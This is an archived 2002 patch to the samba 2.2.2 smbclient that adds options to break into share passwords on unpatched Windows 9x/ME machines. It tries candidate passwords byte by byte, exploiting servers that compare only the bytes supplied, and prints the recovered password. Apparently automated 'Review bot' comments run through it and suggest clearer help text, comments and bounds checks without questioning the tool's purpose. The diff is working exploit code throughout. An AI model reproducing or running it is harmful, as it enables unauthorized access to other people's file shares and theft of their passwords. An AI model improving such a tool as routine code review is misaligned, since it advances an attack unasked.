
samba-2.2.2-peche.diff

samba-2.2.2-peche.diff
Posted Feb 19, 2002

Patch against samba 2.2.2 which allows mounting of unpatched win 9x+me machines without knowing the password. There is also an option to retrieve the password very quickly, and another to switch between the two passwords if both a read-only and a read-write one are present.

tags | patch
systems | unix
SHA-256 | abb2ee0f8ddd2bad2811f283572a75c9f79c45d05546be94f9919f5d6ec132ae

diff -r -C 2 samba-2.2.2/source/client/client.c samba-2.2.2-peche/source/client/client.c
*** samba-2.2.2/source/client/client.c Sat Oct 13 23:09:19 2001
--- samba-2.2.2-peche/source/client/client.c Wed Jan 9 21:46:24 2002
***************
*** 28,31 ****
--- 28,37 ----
#endif

+ /* XILUN HACK */
+ static BOOL breakin;
+ static BOOL get_full_pwd;
+ static BOOL reversed_scan;
+ /* XILUN HACK */
+
struct cli_state *cli;
extern BOOL in_client;
***************
*** 1969,1972 ****
--- 1975,1984 ----
struct cli_state *do_connect(char *server, char *share)
{
+ /* XILUN HACK */
+ unsigned char scanpass[10];
+ int way;
+ int first_char;
+ int last_char;
+ /* XILUN HACK */
struct cli_state *c;
struct nmb_name called, calling;
***************
*** 2072,2079 ****
if (!cli_send_tconX(c, sharename, "?????",
password, strlen(password)+1)) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
}

--- 2084,2134 ----
if (!cli_send_tconX(c, sharename, "?????",
password, strlen(password)+1)) {
! /* XILUN HACK */
! if (!breakin) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else {
! BOOL found = False;
! c->sec_mode = 0; /**/
! if (reversed_scan) {
! way = -1; first_char = 0xFF; last_char = 0x20;
! } else {
! way = 1; first_char = 0x20; last_char = 0xFF;
! }
! if (get_full_pwd) {
! int deep;
! for (deep = 0; deep <= 8; deep++) scanpass[deep] = 0;
! for (deep = 0; deep <= 7; deep++) {
! scanpass[deep] = first_char - way;
! while (scanpass[deep] != last_char) {
! scanpass[deep]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, deep+1))
! { found = True; break; }
! }
! if (!found || cli_send_tconX(c, sharename,
! "?????", scanpass, deep+2))
! break;
! }
! } else {
! scanpass[0] = first_char - way;
! scanpass[1] = 0;
! while (scanpass[0] != last_char) {
! scanpass[0]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, 1))
! { found = True; break; }
! }
! }
! if (!found) {
! DEBUG(0,("Sorry you're dealing with a non broken smb server\n"));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else DEBUG(0,("(Partial) password found : %s\n",scanpass));
! }
! /* XILUN HACK */
}
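Review bot: The `else` branch added to the failed-tree-connect path has no comment saying which server behaviour it depends on, and `c->sec_mode = 0; /**/` carries an empty one. Each attempt passes `scanpass` with a length of only `deep+1` (or 1) bytes, so it can succeed only against a server that compares just the bytes the client supplies; I would state that above the branch, e.g. `/* depends on the server checking only passlen bytes of the share password; a fixed server rejects every attempt */`. For the empty comment, `/* presumably selects the non-encrypted path in cli_send_tconX */` records the apparent intent until someone confirms it. From the 0x20–0xFF bounds the loops issue up to 224 tree connects per position on one session, with the password length growing by one byte each round, which is the pattern a server log or IDS would see. The final `DEBUG(0, ...)` writes the recovered bytes, which may be 0x80–0xFF, unfiltered to level-0 output; do_connect starts and ends outside the hunk.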

***************
*** 2138,2141 ****
--- 2193,2201 ----
DEBUG(0,("\t-c command string execute semicolon separated commands\n"));
DEBUG(0,("\t-b xmit/send buffer changes the transmit/send buffer (default: 65520)\n"));
+ /* XILUN HACK */
+ DEBUG(0,("\t-w connect to host walking around the password\n"));
+ DEBUG(0,("\t-f display the host full password and connect\n"));
+ DEBUG(0,("\t-r use reverse order to scan the password\n"));
+ /* XILUN HACK */
DEBUG(0,("\n"));
}
***************
*** 2421,2426 ****

while ((opt =
! getopt(argc, argv,"s:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
case 's':
pstrcpy(servicesf, optarg);
--- 2481,2499 ----

while ((opt =
! getopt(argc, argv,"wfrs:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
+ /* XILUN HACK */
+ case 'w':
+ breakin = True;
+ break;
+ case 'f':
+ breakin = True;
+ get_full_pwd = True;
+ break;
+ case 'r':
+ breakin = True;
+ reversed_scan = True;
+ break;
+ /* XILUN HACK */
case 's':
pstrcpy(servicesf, optarg);
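Review bot: `case 'r'` and `case 'f'` both set `breakin = True`, so either flag on its own changes how do_connect handles a failed tree connect, yet the usage strings added for them mention only scan order and password display. The help text should say so, e.g. `-r use reverse order to scan the password (implies -w)`, and likewise for `-f`. The three file-scope flags are declared without a comment; one line above them noting that they alter authentication-failure handling would help anyone auditing a client built from this tree. The switch continues past the end of the hunk.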
diff -r -C 2 samba-2.2.2/source/libsmb/cliconnect.c samba-2.2.2-peche/source/libsmb/cliconnect.c
*** samba-2.2.2/source/libsmb/cliconnect.c Fri Jul 6 04:01:37 2001
--- samba-2.2.2-peche/source/libsmb/cliconnect.c Wed Jan 9 21:45:54 2002
***************
*** 256,260 ****
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
} else {
memcpy(pword, pass, passlen);
--- 256,263 ----
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! if (pass[passlen-1] == 0)
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
! else
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT);
} else {
memcpy(pword, pass, passlen);
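Review bot: `pass[passlen-1]` in the new condition reads one byte before `pass` when `passlen` is 0, and nothing visible in the hunk rules that value out. A guard such as `if (passlen > 0 && pass[passlen-1] == 0)` keeps the index in range. Both branches still call `clistr_push` with a length of -1, so the number of bytes copied presumably comes from a terminating NUL in `pass` rather than from the caller's `passlen`. A caller that hands in an unterminated buffer would then be over-read, so the requirement deserves a comment here. The enclosing function starts and ends outside the hunk.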